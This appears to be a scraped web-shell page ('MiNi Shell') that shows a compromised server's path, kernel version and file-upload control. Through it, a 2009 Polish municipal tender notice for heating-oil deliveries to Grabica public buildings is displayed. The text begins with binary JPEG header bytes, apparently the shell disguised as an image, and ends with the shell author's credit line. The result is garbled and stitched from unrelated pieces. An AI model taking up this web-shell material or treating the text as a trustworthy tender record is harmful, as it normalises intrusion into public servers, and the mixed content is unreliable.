JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090116/18631-N-2009.html

<p class="kh_header"><b>Grabica: SUKCESYWNA DOSTAWA OLEJU OPAŁOWEGO LEKKIEGO DO TRZECH BUDYNKÓW UŻYTECZNOŚCI PUBLICZNEJ NA TERENIE GMINY GRABICA</b><br>
<b>Numer ogłoszenia: 18631 - 2009; data zamieszczenia: 16.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Grabica , Grabica 66, 97-306 Grabica, woj. łódzkie, tel. 044 6161188, faks 044 6161188.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminagrabica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA OLEJU OPAŁOWEGO LEKKIEGO DO TRZECH BUDYNKÓW UŻYTECZNOŚCI PUBLICZNEJ NA TERENIE GMINY GRABICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	PRZEDMIOTEM ZAMÓWIENIA JEST - sukcesywna dostawa OLEJU OPAŁOWEGO LEKKIEGO, do trzech budynków użyteczności publicznej na terenie Gminy Grabica to jest: 
-	Urzędu Gminy w Grabicy, Grabica 66
-	Ośrodku Zdrowia w Grabicy, Grabica 55
-	Centrum Edukacji i Rozwiązywania Problemów Alkoholowych  w Kamocinie, Kamocin 47
objętego kodem CPV: 09.13.51.00-5
2.	SZCZEGÓŁOWE WARUNKI ZAMÓWIENIA:

1)	Całkowita dostawa szacowana jest na  40.000 litrów oleju opałowego lekkiego.
2)	Dostawa 40.000 litrów oleju opałowego lekkiego będzie podzielona na sukcesywne dostawy według potrzeb Zamawiającego w okresie od daty podpisania umowy do 31.12.2009 r.
3)	Olej opałowy lekki winien posiadać własności fizykochemiczne gwarantujące odpowiednią jakość i spełnianie obowiązujących norm.
4)	Przy każdej dostawie należy przedstawić certyfikat jakości oleju opałowego.
5)	Dostawę oleju opałowego należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem przez uprawnionego pracownika ze strony Zamawiającego. 
6)	Termin każdorazowej dostawy oleju nie może przekroczyć 48 godzin od momentu otrzymania zlecenia.
7)	Dostawa oleju opałowego będzie odbywać się na koszt Wykonawcy.
8)	W przypadku wątpliwości co do jakości oleju opałowego Zamawiający zleci wykonanie badań oleju w uprawnionym laboratorium. W razie stwierdzenia niezgodności z obowiązującymi normami kosztami badania laboratoryjnego zostanie obciążony Wykonawca dostawy oleju opałowego.
9)	Wobec stwierdzenia powyższego Wykonawca pokryje również koszty związane 
z usunięciem ewentualnej awarii systemu ogrzewania zasilanego tym olejem opałowym. 
10)	W przypadku stwierdzenia niewłaściwej jakości paliwa Wykonawca pokryje wszelkie koszty związane z oczyszczeniem systemu ogrzewania.

3.	WYKONAWCA DOSTAWY:

1)	zobowiązuje się dostarczyć olej opałowy na własny koszt na miejsce wskazane przez Zamawiającego w pkt. II.1.3).1;
2)	gwarantuje odpowiednią jakość oleju opałowego, wg obowiązujących norm; 
3)	pokryje koszt ubezpieczenia zamówienia do momentu jego odbioru przez Zamawiającego;
4)	umożliwi regulowanie należności w formie bezgotówkowej, w ciągu 14 dni od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT;
5)	do każdej faktury, o której mowa w pkt. 4 Wykonawca dołączy:
a) 	dowody wydania - WZ zawierające następujące informacje:
- miejsce i datę zakupu,
- ilość zatankowanego oleju opałowego,
- nazwisko i podpis przyjmującego olej opałowy;
b) 	kserokopię certyfikatu potwierdzającego jakości oleju opałowego potwierdzoną 
za zgodność przez Wykonawcę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki zgodnie z art. 22 ust. 1 ustawy prawo zamówień publicznych z dnia 29 stycznia 2004 roku t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 ze zm.: 
1.	Posiadają uprawnienia do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. (tekst jednolity: Dz. U. Z 2007 r. Nr 223, poz. 1655 z późn, zm.) Prawo zamówień publicznych.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonywania zamówienia.
Wykonawca przedstawi wykaz (według wzoru SIWZ) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, DOSTAW (min. 1) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością, dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. 
Mile widziane będzie
ZAŁĄCZENIE DOKUMENTU POTWIERDZAJĄCEGO, ŻE WYKAZANA DOSTAWA PODOBNA ZOSTAŁA/JEST WYKONYWANA NALEŻYCIE 

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku - t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 z póżn. zm. 

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Ocena spełniania warunków opisanych w pkt. VIII - SIWZ nastąpi na podstawie oświadczeń i dokumentów zawartych w ofercie zgodnie z formułą spełnia - nie spełnia w oparciu o załączone do oferty dokumenty. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w. warunki wykonawca spełnił.
Złożenie przez Wykonawcę nieprawdziwych informacji mających wpływ na wynik prowadzonego postępowania spowoduje wykluczenie oferenta z jego dalszego udziału w nim zgodnie z przepisami art. 24 ust. 2 pkt. 2 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku - (t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.)
Zamawiający, na podstawie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania  wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert. 
Zamawiający wezwie także, w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.
Zamawiający wykluczy z postępowania Wykonawców w przypadkach określonych  w art. 24 ustawy - Prawo zamówień publicznych. Ofertę Wykonawcy wykluczonego uważa się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	oświadczenie w trybie art. 22 ust. 1 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku - t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 z późn.zm. (wzór nr 2);
2)	oświadczenie w trybie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku - t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 z późn.zm. (wzór nr 3);
3)	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku podmiotów występujących wspólnie odpis składa każdy z nich;
4)	aktualna koncesja na wykonywanie działalności gospodarczej w zakresie dystrybucji i obrotu paliwami - w zakresie objętym niniejszym zamówieniem;
5)	oświadczenie o braku zaległości podatkowych wobec Urzędu Skarbowego, ani z zapłatą należności z tytułu składek na Ubezpieczenia Społeczne (wzór nr 4);
6)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw (min. 1) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością, dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wzór nr 5) - mile widziane będzie załączenie dokumentu potwierdzającego, że wykazana dostawa podobna została/jest wykonana/wykonywana należycie;
7)	certyfikat jakości dla oleju opałowego, 
8)	oświadczenie, iż Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia (wzór nr 6)
9)	oświadczenie o akceptacji wzoru umowy (wzór nr 7)
10)	wykaz dostaw wykonywanych przez każdego z partnerów ( wzór nr 8)
11)	pełnomocnictwo dla lidera w przypadku podmiotów występujących wspólnie - podpisane przez wszystkich Wykonawców ubiegających się o udzielenie zamówienia;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - RABAT (wyrażony w złotych) - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.gminagrabica.pl oraz www.grabica.bipjst.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY GRABICA, 97-306 GRABICA
DOSTĘPNA PO ZŁOŻENIU PISEMNEGO WNIOSKU O WYDANIE SIWZ. 
CENA:  10 ZŁ + KOSZTY PRZESYŁKI
SPOSÓB ZAPŁATY ZA SIWZ: 
 - POBRANIE POCZTOWE (W PRZYPADKU WYSYŁKI SIWZ).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2009 godzina 10:00, miejsce: URZĄD GMINY GRABICA, 97-306 GRABICA, POK. 10 I PIĘTRO (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com